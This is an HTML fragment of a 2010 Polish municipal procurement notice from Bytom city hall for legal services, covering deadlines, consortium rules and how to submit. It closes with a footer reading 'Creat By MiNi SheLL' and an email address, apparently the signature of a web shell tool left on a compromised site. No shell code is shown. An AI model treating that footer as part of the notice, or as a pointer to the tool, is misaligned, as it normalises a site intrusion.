<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana wraz z zaproszeniem do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2010 godzina 09:00, miejsce: Urząd Miejski w Bytomiu
ul. Parkowa 2
41-902 Bytom
Wydział Organizacyjny - Kancelaria Urzędu, pok. 243.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zgodnie z art. 23 w związku z art. 141 ustawy pzp, o udzielenie zamówienia wykonawcy mogą ubiegać się wspólnie (np. konsorcja). W takim przypadku, Wykonawcy zobowiązani są do ustanowienia pełnomocnika zgodnie z art. 23 ust. 2 ustawy pzp i przedłożenia pełnomocnictwa. Każdy z konsorcjantów winien obligatoryjnie złożyć oświadczenia i dokumenty dotyczące wykazania braku podstaw do wykluczenia, a jeżeli do reprezentowania wykonawcy wskazano inną osobę niż uprawnioną z mocy prawa, także pełnomocnictwo do działania w imieniu wykonawcy. Pozostałe oświadczenia i dokumenty traktowane będą jako złożone wspólnie przez całe konsorcjum i takiej będą podlegać ocenie. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem (liderem) konsorcjum. 
2. Zamawiajacy na stronie internetowej http://bip.um.bytom.pl/ zamiescił postanowienia umowne dotyczace realizacji niniejszego zamowienia, wzór wniosku o dopuszczenie do udziału w postępowaniu wraz z załącznikami oraz dane Głównego Urzędu Statystycznego.
3. Wniosek o dopuszczenie do udziału w postępowaniu wraz z wymaganymi dokumentami i oświadczeniami należy złożyć w zamkniętej kopercie opisanej: wniosek o dopuszczenie do udziału w postępowaniu na obsługę prawną komórek organizacyjnych Urzędu Miejskiego w Bytomiu - nie otwierać przed 02.12.2010 godz. 9.00.
4. Zamawiający nie zamierza zawierać umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com